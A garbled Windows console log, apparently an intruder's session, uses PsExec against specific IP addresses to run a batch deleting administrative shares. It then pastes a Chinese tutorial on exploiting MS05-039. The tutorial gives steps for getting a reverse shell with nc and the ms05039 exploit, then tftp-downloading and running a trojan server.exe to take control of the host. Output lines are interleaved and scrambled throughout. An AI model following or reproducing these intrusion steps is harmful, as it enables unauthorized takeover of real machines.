PsExec v1.56 - Execute processes remotelyCopyright (C) 2001-2004 Mark RussinovichSysinternals - www.sysinternals.com
Password:
Microsoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>sys.bat
C:\WINNT\system32>net share c$ /del没有提供有效的响应。用户打开了 c$ 上的文件,继续这项操作会强制关闭文件。
是否继续此操作? (Y/N) [N]:此共享的资源不存在。

C:\WINNT\system32>请键入 NET HELPMSG 2310 以获得更多的帮助。net share d$ /del  此共享的资源不存在。

d$ 已经删除。请键入 NET HELPMSG 2310 以获得更多的帮助。


C:\WINNT\system32>net share e$ /dele$ 已经删除。

C:\WINNT\system32>net share f$ /delf$ 已经删除。

C:\WINNT\system32>net share g$ /del
C:\WINNT\system32>net share h$ /del
C:\WINNT\system32>sys.bat
C:\WINNT\system32>net share c$ /delc$ 已经删除。

C:\WINNT\system32>net share d$ /del此共享的资源不存在。

C:\WINNT\system32>请键入 NET HELPMSG 2310 以获得更多的帮助。net share e$ /del  此共享的资源不存在。


请键入 NET HELPMSG 2310 以获得更多的帮助。C:\WINNT\system32>net此共享的资源不存在。 share f$ /del
请键入 NET HELPMSG 2310 以获得更多的帮助。

C:\WINNT\system32>此共享的资源不存在。net share g$ /del  请键入 NET HELPMSG 2310 以获得更多的帮助。


此共享的资源不存在。C:\WINNT\system32>net请键入 NET HELPMSG 2310 以获得更多的帮助。 share h$ /del

C:\WINNT\system32>sys.bat
C:\WINNT\system32>net share c$ /del此共享的资源不存在。

C:\WINNT\system32>请键入 NET HELPMSG 2310 以获得更多的帮助。net share d$ /del  此共享的资源不存在。


请键入 NET HELPMSG 2310 以获得更多的帮助。C:\WINNT\system32>net此共享的资源不存在。 share e$ /del
请键入 NET HELPMSG 2310 以获得更多的帮助。

C:\WINNT\system32>此共享的资源不存在。net share f$ /del
请键入 NET HELPMSG 2310 以获得更多的帮助。

C:\WINNT\system32>此共享的资源不存在。net share g$ /del  请键入 NET HELPMSG 2310 以获得更多的帮助。


此共享的资源不存在。C:\WINNT\system32>net请键入 NET HELPMSG 2310 以获得更多的帮助。 share h$ /del

C:\WINNT\system32>G:设备未就绪。
C:\WINNT\system32>^Ccmd exited on 211.64.201.77 with error code 0.
G:\1>pslist \\211.64.198.51

G:\1>pslist \\211.64.198.51

G:\1>psexec \\211.64.198.51 -u administrator cmd
PsExec v1.56 - Execute processes remotelyCopyright (C) 2001-2004 Mark RussinovichSysinternals - www.sysinternals.com
Password:
Microsoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>^A


http://www.soso123.com/down/list.asp?id=101
【ms05039溢出入侵步骤】211.64.201.174,"WWWFOX-NET","WWWFOX-NET","Vulnerable"

利用ms05039溢出入侵步骤 
--------------------------------------------------------------------------------www.hackbase.com 阅读:20612 时间:2005-12-5 0:21:21 来源:黑基博客  1 用ms05039scan扫描可以入侵的主机2 use nc to listen local port,command: nc -vv -l -p 12343 use溢出tool进行溢出,command: ms05039 目标IP 本地IP 1234If you are successful,nc窗口将返回一个shell4 在本地用tftp32.exe建立一个tftp服务器,配置一个木马服务段server.exe5 在shell中执行command: tftp -i 本地IP get server.exe6 在shell中运行server.exe
现在,这台机子就是你的肉鸡了